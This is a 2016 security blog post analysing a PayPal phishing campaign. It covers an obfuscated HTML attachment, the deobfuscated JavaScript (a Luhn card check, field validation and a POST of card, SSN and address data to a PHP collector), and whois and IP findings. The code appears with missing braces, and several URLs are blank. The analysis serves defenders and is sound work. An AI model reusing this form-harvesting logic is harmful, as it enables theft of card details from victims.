Monday, July 25, 2016

SPAM / SCAM campaign to steal Credit Card Details (I)

In the last weeks I have looked to several SPAM / SCAM campaigns targeting endusers and business. In some cases the intention was to fool the users to steal their credit cards details, but it was not always the case.

Cyber Criminals mimic any kind of business using multiple tricks. For example, fake invoices from Amazon or, some security warning messages from PayPal, ebay or some customer service message from banks across the world.

In this case I'm going to talk about one interesting campaign currently happening against PayPal.

Initially a SCAM email like the one below is sent to the victim. The email contains an HTML file attached. If the enduser is lucky, the email will be detected as SPAM by the mail filters, but this has not been always the case. The HTML in all the cases were not detected as malicious by the AV. The HTML used in this post, which I have uploaded to VirusTotal, is only detected by 3 engines

The HTML file once opened with any browser shows a form requesting several information including Credit Card details.

Looking at the HTML source, I see some JavaScript code obfuscated. All the code is in a single line.

With the help of the tool 'js-beauty'  installed in Remnux, the JavaScript code is 'cleaned' which allows do some debugging.

Using the Firebug JavaScript debugger, I can debug the code. There are several functions to manipulate the date embebed in the HTML code. 

Using some breakpoints I can extract the content of the variable BkozdlkPhvQy, which contains the final HTML that will be presented to the victim

This new HTML code can be extracted for further analysis.

Again, with the help of Firebug I can run the JavaScript code step by step.

There are several functions in the code which looks interesting.  Moreover, I find referenced some URLs and and some PHP code 9d681cd81c49939eb384d49051d7e272.php.

<script type = "text/javascript"
 language = "javascript" >
     var _0x297b9e = "9d681cd81c49939eb384d49051d7e272.php";
 var _0x3a657d = (function(a) {
     return function(f) {
         var b = f.length,
             e = 1,
             c = 0,
         while (b) {
             d = parseInt(f.charAt(--b), 10);
             c += (e ^= 1) ? a[d] : d
         return c && c % 10 === 0
 }([0, 2, 4, 6, 8, 1, 3, 5, 7, 9]));
 var _0x78eb7f = "";
 var _0x68bfad = 0;

 function PSubmit() {
     if (!_0x529953()) {
         return false;
     if (!_0x68bfad) _0x78eb7f += _0x297b9e;
     document.forms["env"].action = _0x78eb7f;
     document.forms["env"].method = "post";

 function _0x529953() {
     ax = _0x3a657d(document.env.MBcnum.value);
     if (!ax) return window.location.replace(""), !1;
     var a = document.env.MBaddr.value,
         c = document.env.MBem.value,
         b = document.env.MBey.value,
         d = document.env.MBcv.value;
     if (!document.env.MBfn.value || !a || !d || "00" == c || "00" == b) return window.location.replace(""), !1;
     a = document.env.MBssn.value;
     c = a.length;
     b = 9; - 1 != a.indexOf("-") && (b += 2);
     if ("United States" == document.env.MBctn.value) {
         if (0 < c && c != b) return window.location.replace(""), !1;
         a = document.env.MBzip.value.length;
         if (0 < a && 5 != a) return window.location.replace(""), !1
     return !0


The first function referenced by var _0x3a657d is in charge of checking if the Credit Card number introduced is a valid one. If it it is not, it will redirect to

Second function, Psumit() is in charge of sending the data through a POST request. All the data will be sent to the URL

Last function, _0x529953(), is in charge of performing more additional checks, it checks:

  • that the address filled in the form is not empty
  • that the month, year and CVV filled in the credit card details from the form is not empty and is not 0
  • that the name filled is not empty
  • if the country selected is US, the SSN and the Zip Code has the correct length

If all the conditions do not happen the browser is redirect to Otherwise, the data filled in the form is sent to Below and example of the HTTP POST. 

This is quite interesting as the criminals are taking care that they will only receive valid data thought the form so they do not need to check the data received.

After the data is sent through the POST, the PHP script redirects to

As a test, I can request manually the resource directly with the IP and I'm redirected to PayPal as well.

Checking the domain I can see it has been created the day before the email was sent. 

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to
for detailed information.

   Domain Name: CANDIDATE7.COM
   Sponsoring Registrar IANA ID: 303
   Whois Server:
   Referral URL:
   Name Server: NS1.DYNU.COM
   Name Server: NS2.DYNU.COM
   Name Server: NS3.DYNU.COM
   Name Server: NS4.DYNU.COM
   Name Server: NS5.DYNU.COM
   Status: clientTransferProhibited
   Updated Date: 22-jul-2016
   Creation Date: 20-jul-2016
   Expiration Date: 20-jul-2017

>>> Last update of whois database: Sun, 24 Jul 2016 08:47:13 GMT <<<

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registry Domain ID: 2044541489_DOMAIN_COM-VRSN
Registrar WHOIS Server:
Registrar URL:
Updated Date: 2016-07-20T01:43:14Z
Creation Date: 2016-07-20T01:43:12Z
Registrar Registration Expiration Date: 2017-07-20T01:43:12Z
Registrar: PDR Ltd. d/b/a
Registrar IANA ID: 303
Domain Status: clientTransferProhibited
Registry Registrant ID:
Registrant Name: Alex Tankredi
Registrant Organization: N/A
Registrant Street: 289 rendang rd no 28b
Registrant City: kuala lumpur
Registrant State/Province: kl
Registrant Postal Code: 248195
Registrant Country: MY
Registrant Phone: +60.601848928124
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email:
Registry Admin ID:
Admin Name: Alex Tankredi
Admin Organization: N/A
Admin Street: 289 rendang rd no 28b
Admin City: kuala lumpur
Admin State/Province: kl
Admin Postal Code: 248195
Admin Country: MY
Admin Phone: +60.601848928124
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email:
Registry Tech ID:
Tech Name: Alex Tankredi
Tech Organization: N/A
Tech Street: 289 rendang rd no 28b
Tech City: kuala lumpur
Tech State/Province: kl
Tech Postal Code: 248195
Tech Country: MY
Tech Phone: +60.601848928124
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email:

Under the same e-mail address, several other domains have been registered.

The domains used for this campaign, and resolve to the same IP The three off them have been registered around the same time. By the way, the IP is a Tor node

And all the subdomains, and resolve also to the same IP, which is the one that cyber threat actors are using to receive the data from the form.

This is what happens in essence:
  • Cyber Threat Actors registered several domains across the same time. All of them with the same name resolving to the same IP. 
  • In a very short period of time after the registration of the new domains,  all the SCAM emails are sent with an HTML attached. The HTML is obfuscated to avoid detection
  • The HTML contains an HTTP form to steal the credit card data. This form only sends the data to the threat actors if the information is somehow valid and not faked. 
  • After the POST request, the user is redirected to the real PayPal website.
Once the domains are black listed, they again register new domains and proceed again from the step 1.


(More to come)